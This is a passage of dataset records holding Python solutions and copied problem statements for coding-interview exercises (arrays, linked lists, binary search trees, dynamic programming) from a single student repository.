"path": "/Find Duplicate in Array.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nFind Duplicate in Array\r\nAsked in: \r\nAmazon\r\nVMWare\r\nRiverbed\r\nGiven a read only array of n + 1 integers between 1 and n, find one number that repeats in linear time using less than O(n) space and traversing the stream sequentially O(1) times.\r\n\r\nSample Input:\r\n\r\n[3 4 1 4 1]\r\nSample Output:\r\n\r\n1\r\nIf there are multiple possible answers ( like in the sample case above ), output any one.\r\n\r\nIf there is no duplicate, output -1\r\n\r\n\r\nclass Solution:\r\n # @param A : tuple of integers\r\n # @return an integer\r\n def repeatedNumber(self, A):\r\n A = list(A)\r\n n = len(A)\r\n for i in range(n):\r\n index = A[i]%n\r\n A[index] = A[index] + n\r\n \r\n for j in range(n):\r\n if A[j]//n > 1:\r\n return j\r\n \r\n return -1\r\n \r\n\"\"\"\r\nclass Solution:\r\n # @param A : tuple of integers\r\n # @return an integer\r\n def repeatedNumber(self, A):\r\n lenA = len(A)\r\n temp = [0]*lenA\r\n for i in A:\r\n if temp[i - 1]:\r\n return i\r\n else:\r\n temp[i - 1] = 1\r\n return -1\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.6485743522644043,
"alphanum_fraction": 0.6681552529335022,
"avg_line_length": 18.286712646484375,
"blob_id": "331163a6160633bb93e65aad0d9a2665431af621",
"content_id": "d460a4e52c01c17ac4516daaaa350e965fb62a42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2911,
"license_type": "no_license",
"max_line_length": 522,
"num_lines": 143,
"path": "/Migratory birds (count array).py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nMigratory Birds\r\n173.48 more points to get your gold badge!\r\nRank: 167259|Points: 676.52/850\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nYou have been asked to help study the population of birds migrating across the continent. Each type of bird you are interested in will be identified by an integer value. Each time a particular kind of bird is spotted, its id number will be added to your array of sightings. You would like to be able to find out which type of bird is most common given a list of sightings. Your task is to print the type number of that bird and if two or more types of birds are equally common, choose the type with the smallest ID number.\r\n\r\nFor example, assume your bird sightings are of types\r\n. There are two each of types and , and one sighting of type . Pick the lower of the two types seen twice: type\r\n\r\n.\r\n\r\nFunction Description\r\n\r\nComplete the migratoryBirds function in the editor below. It should return the lowest type number of the most frequently sighted bird.\r\n\r\nmigratoryBirds has the following parameter(s):\r\n\r\n arr: an array of integers representing types of birds sighted\r\n\r\nInput Format\r\n\r\nThe first line contains an integer denoting\r\n, the number of birds sighted and reported in the array .\r\nThe second line describes as\r\n\r\nspace-separated integers representing the type numbers of each bird sighted.\r\n\r\nConstraints\r\n\r\nIt is guaranteed that each type is , , , , or\r\n\r\n .\r\n\r\nOutput Format\r\n\r\nPrint the type number of the most common bird; if two or more types of birds are equally common, choose the type with the smallest ID number.\r\n\r\nSample Input 0\r\n\r\n6\r\n1 4 4 4 5 3\r\n\r\nSample Output 0\r\n\r\n4\r\n\r\nExplanation 0\r\n\r\nThe different types of birds occur in the following frequencies:\r\n\r\n Type \r\n\r\n:\r\nbird\r\nType\r\n:\r\nbirds\r\nType\r\n:\r\nbird\r\nType\r\n:\r\nbirds\r\nType\r\n:\r\n\r\n bird\r\n\r\nThe type number that occurs at the highest frequency is type\r\n, so we print\r\n\r\nas our answer.\r\n\r\nSample Input 1\r\n\r\n11\r\n1 2 3 4 5 4 3 2 1 3 4\r\n\r\nSample Output 1\r\n\r\n3\r\n\r\nExplanation 1\r\n\r\nThe different types of birds occur in the following frequencies:\r\n\r\n Type \r\n\r\n: Type : Type : Type : Type : Two types have a frequency of , and the lower of those is type .\r\n\r\n\r\n\"\"\"\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the migratoryBirds function below.\r\ndef migratoryBirds(arr):\r\n c_ar = [0]*5\r\n for i in arr:\r\n c_ar[i-1] += 1\r\n ma = c_ar[0]\r\n f = 0\r\n for i in range (1, 5):\r\n if(ma<c_ar[i]):\r\n ma = c_ar[i]\r\n f = i+1\r\n return f\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n arr_count = int(input().strip())\r\n\r\n arr = list(map(int, input().rstrip().split()))\r\n\r\n result = migratoryBirds(arr)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6163661479949951,
"alphanum_fraction": 0.6360610127449036,
"avg_line_length": 21.562091827392578,
"blob_id": "64d5396ca612196ffdf65d0482c7bdd60b41bab3",
"content_id": "f2d3023e869128131fcb15870f15e31a044a6c0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3607,
"license_type": "no_license",
"max_line_length": 316,
"num_lines": 153,
"path": "/Merge two sorted linked lists.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nMerge two sorted linked lists\r\n1272.43 more points to get your next star!\r\nRank: 111904|Points: 927.57/2200\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nThis challenge is part of a tutorial track by MyCodeSchool\r\n\r\nYou’re given the pointer to the head nodes of two sorted linked lists. The data in both lists will be sorted in ascending order. Change the next pointers to obtain a single, merged linked list which also has data in ascending order. Either head pointer given may be null meaning that the corresponding list is empty.\r\n\r\nInput Format\r\n\r\nYou have to complete the SinglyLinkedListNode MergeLists(SinglyLinkedListNode headA, SinglyLinkedListNode headB) method which takes two arguments - the heads of the two sorted linked lists to merge. You should NOT read any input from stdin/console.\r\n\r\nThe input is handled by the code in the editor and the format is as follows:\r\n\r\nThe first line contains an integer\r\n\r\n, denoting the number of test cases.\r\nThe format for each test case is as follows:\r\n\r\nThe first line contains an integer\r\n, denoting the length of the first linked list.\r\nThe next lines contain an integer each, denoting the elements of the linked list.\r\nThe next line contains an integer , denoting the length of the second linked list.\r\nThe next\r\n\r\nlines contain an integer each, denoting the elements of the second linked list.\r\n\r\nConstraints\r\n\r\n, where is the\r\n\r\n element of the list.\r\n\r\nOutput Format\r\n\r\nChange the next pointer of individual nodes so that nodes from both lists are merged into a single list. Then return the head of this merged list. Do NOT print anything to stdout/console.\r\n\r\nThe output is handled by the editor and the format is as follows:\r\n\r\nFor each test case, print in a new line, the linked list after merging them separated by spaces.\r\n\r\nSample Input\r\n\r\n1\r\n3\r\n1\r\n2\r\n3\r\n2\r\n3\r\n4\r\n\r\nSample Output\r\n\r\n1 2 3 3 4 \r\n\r\nExplanation\r\n\r\nThe first linked list is: 1 -> 2 -> 3 -> NULL\r\n\r\nThe second linked list is: 3 -> 4 -> NULL\r\n\r\nHence, the merged linked list is: 1 -> 2 -> 3 -> 3 -> 4 -> NULL\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\nclass SinglyLinkedListNode:\r\n def __init__(self, node_data):\r\n self.data = node_data\r\n self.next = None\r\n\r\nclass SinglyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert_node(self, node_data):\r\n node = SinglyLinkedListNode(node_data)\r\n\r\n if not self.head:\r\n self.head = node\r\n else:\r\n self.tail.next = node\r\n\r\n\r\n self.tail = node\r\n\r\ndef print_singly_linked_list(node, sep, fptr):\r\n while node:\r\n fptr.write(str(node.data))\r\n\r\n node = node.next\r\n\r\n if node:\r\n fptr.write(sep)\r\n\r\n# Complete the mergeLists function below.\r\n\r\n#\r\n# For your reference:\r\n#\r\n# SinglyLinkedListNode:\r\n# int data\r\n# SinglyLinkedListNode next\r\n#\r\n#\r\ndef mergeLists(h1, h2):\r\n h3 = SinglyLinkedListNode(-1)\r\n t = h3\r\n while(h1 != None and h2 != None):\r\n if(h1.data < h2.data):\r\n x = SinglyLinkedListNode(h1.data)\r\n x = h1\r\n h1= h1.next\r\n x.next = None\r\n h3.next = x\r\n h3 = x\r\n else:\r\n x = SinglyLinkedListNode(h2.data)\r\n x = h2\r\n h2= h2.next\r\n x.next = None\r\n h3.next = x\r\n h3 = x\r\n if(h1 != None):\r\n h3.next = h1\r\n else:\r\n h3.next = h2\r\n return 
t.next\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n"
},
{
"alpha_fraction": 0.4561053514480591,
"alphanum_fraction": 0.48164406418800354,
"avg_line_length": 18.04800033569336,
"blob_id": "89eef01943ddae8344f048012c7fd88b4a350f81",
"content_id": "5881613cea80071bad0418a0f742194c109d5d39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2506,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 125,
"path": "/Level Order of Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nLevel Order of Tree\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a\r\nBinary Search Tree and print the Level Order of the tree.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases.\r\nIts followed by 2T lines. First line of each test case contains\r\nN - number of nodes in the BST. The next line contains N unique\r\nintegers - value of the nodes.\r\n\r\nConstraints\r\n\r\nFor each test case, print the Level Order of the Binary Search Tree,\r\nseparate each level by newline. Separate the output of different test\r\ncases with an extra newline.\r\n\r\nOutput Format\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5 \r\n5\r\n3 2 4 1 5 \r\n7\r\n4 5 15 0 1 7 17 \r\n\r\nSample Output 0\r\n\r\n1 \r\n2 \r\n3 \r\n4 \r\n5 \r\n\r\n3 \r\n2 4 \r\n1 5 \r\n\r\n4 \r\n0 5 \r\n1 15 \r\n7 17 \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def _str_(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if (self.root == None):\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\ndef levelor(root):\r\n if root is None: \r\n return\r\n q = [] \r\n q.append(root) \r\n \r\n while q: \r\n count = len(q) \r\n while count > 0: \r\n temp = q.pop(0) \r\n print(temp.info, end = ' ') \r\n if temp.left: \r\n q.append(temp.left) \r\n if temp.right: \r\n q.append(temp.right) \r\n \r\n count -= 1\r\n print(' ') \r\n\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n tree = BinarySearchTree()\r\n ar = list(map(int, input().split()))\r\n for i in ar:\r\n tree.create(i)\r\n levelor(tree.root)\r\n print()\r\n"
},
{
"alpha_fraction": 0.34730538725852966,
"alphanum_fraction": 0.41916167736053467,
"avg_line_length": 14.699999809265137,
"blob_id": "620916164678b591d292346c9789409bbdc0ac76",
"content_id": "34366c52107d760754e73a7ca71a11f7936db0d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/ATM.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "l = input().split()\r\n\r\nA = int(l[0])\r\n\r\nB = float(l[1])\r\n\r\nif((A<B)and(A%5==0)and (A<=2000)):\r\n print(\"%.2f\"%(B-A-0.5))\r\nif((B>A)or(A==B)):\r\n print(\"%.2f\"%(B))\r\n"
},
{
"alpha_fraction": 0.598739504814148,
"alphanum_fraction": 0.6764705777168274,
"avg_line_length": 20.3125,
"blob_id": "799c69fae9e705e9bb90f46cd2b5e33cc32e520c",
"content_id": "dc71b31dc37a7e613ed8150aef78947a0bd1aa8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1428,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 64,
"path": "/Arranging Dominos DP.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nArranging Dominos\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nYou are given a floor of size 5xN. You have tiles of 2 different sizes: 1x5 and 2x5. Of course, you can rotate the tiles to get 2 more tile sizes: 5x1 and 5x2. You have to do the flooring using these tiles in the following way:\r\n1. Floor space should be completely covered by tiles.\r\n2. You cannot break tiles, ie, you have to use a tile entirely or not at all.\r\n3. Any tile should not extend beyond the floor space.\r\n4. Tiles should be placed parallel to the floor boundaries.\r\n\r\nYour task is to find the number of ways in which you can lay the tiles on the floor.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by T lines, each line contains N - the length of the floor. The width of the floor is fixed to be 5.\r\n\r\nConstraints\r\n\r\n1 <= T <= 10000\r\n1 <= N <= 106\r\n\r\nOutput Format\r\n\r\nFor each test case, print the number of ways in which you can lay the tiles on the floor, separated by new line. Since the output can be very large, print result % 1000000007 [1e9+7].\r\n\r\nSample Input 0\r\n\r\n5\r\n2\r\n4\r\n20\r\n120\r\n10\r\n\r\nSample Output 0\r\n\r\n2\r\n5\r\n466098\r\n562804719\r\n457\r\n\r\n\r\n\r\n\"\"\"\r\n\r\ndp=[0]*1000001\r\ndp[0]=1\r\ndp[1]=1\r\ndp[2]=2\r\ndp[3]=3\r\ndp[4]=5\r\n\r\nm=1000000007 \r\nfor i in range(5,1000001):\r\n dp[i]=(dp[i-1]+dp[i-2]+(8*dp[i-5]))%m\r\nfor _ in range(int(input())):\r\n n=int(input())\r\n print(dp[n]%m)\r\n"
},
{
"alpha_fraction": 0.6279823184013367,
"alphanum_fraction": 0.6374079585075378,
"avg_line_length": 29.728971481323242,
"blob_id": "4a320a9cbd930cd074bd36b40ce6a918847b8f54",
"content_id": "7f6a879b446521975dc76eddfc8a978cf90436ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3395,
"license_type": "no_license",
"max_line_length": 319,
"num_lines": 107,
"path": "/Two Characters.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTwo Characters\r\n\r\n120.76 more points to get your gold badge!\r\nRank: 154912|Points: 729.24/850\r\nProblem Solving\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nEditorial\r\nIn this challenge, you will be given a string. You must remove characters until the string is made up of any two alternating characters. When you choose a character to remove, all instances of that character must be removed. Your goal is to create the longest string possible that contains just two alternating letters.\r\n\r\nAs an example, consider the string abaacdabd. If you delete the character a, you will be left with the string bcdbd. Now, removing the character c leaves you with a valid string bdbd having a length of 4. Removing either b or d at any point would not result in a valid string.\r\n\r\nGiven a string , convert it to the longest possible string made up only of alternating characters. Print the length of string on a new line. If no string can be formed, print instead.\r\n\r\nFunction Description\r\n\r\nComplete the alternate function in the editor below. It should return an integer that denotes the longest string that can be formed, or if it cannot be done.\r\n\r\nalternate has the following parameter(s):\r\n\r\ns: a string\r\nInput Format\r\n\r\nThe first line contains a single integer denoting the length of .\r\nThe second line contains string .\r\n\r\nConstraints\r\n\r\nOutput Format\r\n\r\nPrint a single integer denoting the maximum length of for the given ; if it is not possible to form string , print instead.\r\n\r\nSample Input\r\n\r\n10\r\nbeabeefeab\r\nSample Output\r\n\r\n5\r\nExplanation\r\n\r\nThe characters present in are a, b, e, and f. This means that must consist of two of those characters and we must delete two others. Our choices for characters to leave are [a,b], [a,e], [a, f], [b, e], [b, f] and [e, f].\r\n\r\nIf we delete e and f, the resulting string is babab. This is a valid as there are only two distinct characters (a and b), and they are alternating within the string.\r\n\r\nIf we delete a and f, the resulting string is bebeeeb. This is not a valid string because there are consecutive e's present. Removing them would leave consecutive b's, so this fails to produce a valid string .\r\n\r\nOther cases are solved similarly.\r\n\r\nbabab is the longest string we can create.\r\n\r\n\"\"\"\r\n\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the alternate function below.\r\ndef alternate(s):\r\n maxl = count = 0\r\n alp = list(set(s))\r\n # make combinations\r\n for i in range (len(alp)):\r\n for j in range(i+1, len(alp)):\r\n l = [alp[i], alp[j]]\r\n if(s.index(alp[i])<s.index(alp[j])):\r\n ind = 0\r\n else:\r\n ind = 1\r\n for ch in s:\r\n if ch in l:\r\n if(ch == l[ind]):\r\n count += 1\r\n ind = ind ^ 1\r\n else:\r\n # this cond is for to break if nxt char is also a same\r\n # as previous char\r\n count = 0\r\n break \r\n maxl = max(maxl, count )\r\n count = 0\r\n return maxl\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n l = int(input().strip())\r\n\r\n s = input()\r\n\r\n result = alternate(s)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n"
},
{
"alpha_fraction": 0.62994784116745,
"alphanum_fraction": 0.6489720940589905,
"avg_line_length": 20.170068740844727,
"blob_id": "dc0357f892bc5058e0f6fc2eba9065807d0a2473",
"content_id": "2c53555bcb95a208a08280fc3cd43f4b881368e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3261,
"license_type": "no_license",
"max_line_length": 335,
"num_lines": 147,
"path": "/Compare two linked lists.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nCompare two linked lists\r\n1277.43 more points to get your next star!\r\nRank: 112809|Points: 922.57/2200\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nThis challenge is part of a tutorial track by MyCodeSchool\r\n\r\nYou’re given the pointer to the head nodes of two linked lists. Compare the data in the nodes of the linked lists to check if they are equal. The lists are equal only if they have the same number of nodes and corresponding nodes contain the same data. Either head pointer given may be null meaning that the corresponding list is empty.\r\n\r\nInput Format\r\n\r\nYou have to complete the int CompareLists(Node* headA, Node* headB) method which takes two arguments - the heads of the two linked lists to compare. You should NOT read any input from stdin/console.\r\n\r\nThe input is handled by the code in the editor and the format is as follows: The first line contains\r\n\r\n, the number of test cases. The format for each test case is as follows:\r\n\r\nThe first line contains an integer\r\n, denoting the number of elements in the first linked list.\r\nThe next lines contain an integer each, denoting the elements of the first linked list.\r\nThe next line contains an integer , denoting the number of elements in the second linked list.\r\nThe next\r\n\r\nlines contain an integer each, denoting the elements of the second linked list.\r\n\r\nConstraints\r\n\r\n, where is the\r\n\r\n element in the list.\r\n\r\nOutput Format\r\n\r\nCompare the two linked lists and return 1 if the lists are equal. Otherwise, return 0. Do NOT print anything to stdout/console.\r\n\r\nThe output is handled by the code in the editor and it is as follows:\r\n\r\nFor each test case, in a new line, print\r\nif the two lists are equal, else print\r\n\r\n.\r\n\r\nSample Input\r\n\r\n2\r\n2\r\n1\r\n2\r\n1\r\n1\r\n2\r\n1\r\n2\r\n2\r\n1\r\n2\r\n\r\nSample Output\r\n\r\n0\r\n1\r\n\r\nExplanation\r\n\r\nIn the first case, linked lists are: 1 -> 2 -> NULL and 1 -> NULL\r\n\r\nIn the second case, linked lists are: 1 -> 2 -> NULL and 1 -> 2 -> NULL\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport os\r\nimport sys\r\n\r\nclass SinglyLinkedListNode:\r\n def __init__(self, node_data):\r\n self.data = node_data\r\n self.next = None\r\n\r\nclass SinglyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert_node(self, node_data):\r\n node = SinglyLinkedListNode(node_data)\r\n\r\n if not self.head:\r\n self.head = node\r\n else:\r\n self.tail.next = node\r\n\r\n\r\n self.tail = node\r\n\r\ndef print_singly_linked_list(node, sep, fptr):\r\n while node:\r\n fptr.write(str(node.data))\r\n\r\n node = node.next\r\n\r\n if node:\r\n fptr.write(sep)\r\n\r\n# Complete the compare_lists function below.\r\n\r\n#\r\n# For your reference:\r\n#\r\n# SinglyLinkedListNode:\r\n# int data\r\n# SinglyLinkedListNode next\r\n#\r\n#\r\ndef compare_lists(llist1, llist2):\r\n while(llist1 != None and llist2 != None):\r\n if(llist1.data == llist2.data):\r\n \r\n llist1 = llist1.next\r\n llist2 = llist2.next\r\n else:\r\n return 0\r\n if(llist1 == None and llist2 == None):\r\n return 1 \r\n if(llist1 == None or llist2 == None):\r\n return 0\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n"
},
{
"alpha_fraction": 0.4275362193584442,
"alphanum_fraction": 0.4521739184856415,
"avg_line_length": 17.58823585510254,
"blob_id": "1698346dd9c70a3e5cb4235a33ea60771187aea7",
"content_id": "17ecc4a8dbdb947dac81fb082a69e0e5fbbd6183",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 690,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 34,
"path": "/Implement power fun.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nImplement pow(x, n) % d.\r\n\r\nIn other words, given x, n and d,\r\n\r\nfind (xn % d)\r\n\r\nNote that remainders on division cannot be negative.\r\nIn other words, make sure the answer you return is non negative.\r\n\r\nInput : x = 2, n = 3, d = 3\r\nOutput : 2\r\n\r\n2^3 % 3 = 8 % 3 = 2.\r\n\r\n\r\n\"\"\"\r\n\r\nclass Solution:\r\n # @param x : integer\r\n # @param n : integer\r\n # @param d : integer\r\n # @return an integer\r\n \r\n def pow(self, x, n, d):\r\n if(x==0):\r\n return 0\r\n if(n==0):\r\n return 1\r\n ans = pow(x, n//2, d)\r\n if(n&1==0):\r\n return (ans * ans)%d\r\n else:\r\n return (ans * ans * x)%d\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.5060137510299683,
"alphanum_fraction": 0.519759476184845,
"avg_line_length": 19.33333396911621,
"blob_id": "f6099d30f57a33f29504ae2dd2a53cbee62e54f3",
"content_id": "eca07ae8aadc0c21d4efdf1da7e197339f9f22cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1164,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 54,
"path": "/Remove Nth Node from List End.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nRemove Nth Node from List End\r\n\r\n Asked in: \r\n HCL\r\n Amazon\r\n\r\nGiven a linked list, remove the nth node from the end of list and return its head.\r\n\r\nFor example,\r\nGiven linked list: 1->2->3->4->5, and n = 2.\r\nAfter removing the second node from the end, the linked list becomes 1->2->3->5.\r\n\r\n Note:\r\n\r\n If n is greater than the size of the list, remove the first node of the list.\r\n\r\nTry doing it using constant additional space.\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : integer\r\n # @return the head node in the linked list\r\n def removeNthFromEnd(self, A, B):\r\n x=A\r\n count=0\r\n while(x!=None):\r\n count+=1\r\n x=x.next\r\n if(count==1):\r\n x=None\r\n return x\r\n if(count<=B):\r\n A=A.next\r\n return A\r\n s=count-B+1\r\n x=A\r\n for i in range(0,s-2):\r\n x=x.next\r\n x.next=x.next.next\r\n return A\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.46463415026664734,
"alphanum_fraction": 0.48821139335632324,
"avg_line_length": 20.77777862548828,
"blob_id": "dd6735068596b7cefa1c9477d5aca89e7752552f",
"content_id": "046450ff089c005807cb53add4a0ba547f847399",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2460,
"license_type": "no_license",
"max_line_length": 213,
"num_lines": 108,
"path": "/Left View of Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nLeft View of Tree\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a Binary Search Tree and print the left-view of the tree. Left view of a Tree is the set of nodes visible when tree is viewed from left side.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by 2T lines. First line of each test case contains N - number of nodes in the BST. The next line contains N unique integers - value of the nodes.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the left-view of the Binary Search Tree, separated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5\r\n5\r\n3 2 4 1 5\r\n7\r\n4 5 15 0 1 7 17\r\n\r\nSample Output 0\r\n\r\n1 2 3 4 5 \r\n3 2 1 \r\n4 0 1 7 \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nclass Node:\r\n def _init_(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def _str_(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def _init_(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if (self.root == None):\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\ndef levelor(root):\r\n if root is None: \r\n return\r\n q = [] \r\n q.append(root)\r\n \r\n while(len(q)>0):\r\n k=len(q)\r\n temp=[]\r\n for i in range(0,k):\r\n x = q.pop(0)\r\n temp.append(x)\r\n if(x.left != None):\r\n q.append(x.left)\r\n if(x.right != None):\r\n q.append(x.right)\r\n print(temp[0].info,end=\" \")\r\n # print()\r\n\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n tree = BinarySearchTree()\r\n ar = list(map(int, input().split()))\r\n for i in ar:\r\n tree.create(i)\r\n levelor(tree.root)\r\n print()\r\n"
},
{
"alpha_fraction": 0.4952380955219269,
"alphanum_fraction": 0.5309523940086365,
"avg_line_length": 9.50684928894043,
"blob_id": "9bf91217f6e2d5b0e801356f440222d788862f20",
"content_id": "440ce4d25fce75779b6670b7599bb21ec3d20876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 840,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 73,
"path": "/Excel Column Number.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nExcel Column Number\r\nAsked in: \r\nAmazon\r\nProblem Description\r\n\r\nGiven a column title A as appears in an Excel sheet, return its corresponding column number.\r\n\r\n\r\n\r\nProblem Constraints\r\n1 <= |A| <= 100\r\n\r\n\r\n\r\nInput Format\r\nFirst and only argument is string A.\r\n\r\n\r\n\r\nOutput Format\r\nReturn an integer\r\n\r\n\r\n\r\nExample Input\r\nInput 1:\r\n\r\n 1\r\nInput 2:\r\n\r\n 28\r\n\r\n\r\nExample Output\r\nOutput 1:\r\n\r\n \"A\"\r\nOutput 2:\r\n\r\n \"AB\"\r\n\r\n\r\nExample Explanation\r\nExplanation 1:\r\n\r\n 1 -> \"A\"\r\nExplanation 2:\r\n\r\nA -> 1\r\nB -> 2\r\nC -> 3\r\n...\r\nZ -> 26\r\nAA -> 27\r\nAB -> 28 \r\n\r\n\r\n\"\"\"\r\n\r\n\r\n\r\nclass Solution:\r\n # @param A : string\r\n # @return an integer\r\n def titleToNumber(self, A):\r\n \r\n B = A[::-1]\r\n total = 0\r\n for i in range( 0, len( B ) ):\r\n total += ( ord( B[i] ) - 64 ) * pow( 26, i ) \r\n return total\r\n"
},
{
"alpha_fraction": 0.3842729926109314,
"alphanum_fraction": 0.4154302775859833,
"avg_line_length": 22.288288116455078,
"blob_id": "0ee8679c757c4cb0f59c0832138174556d7e7300",
"content_id": "73d349c0c03ad7404fa6649981f978c5d8997b5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2696,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 111,
"path": "/ADD No LinkedLists.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
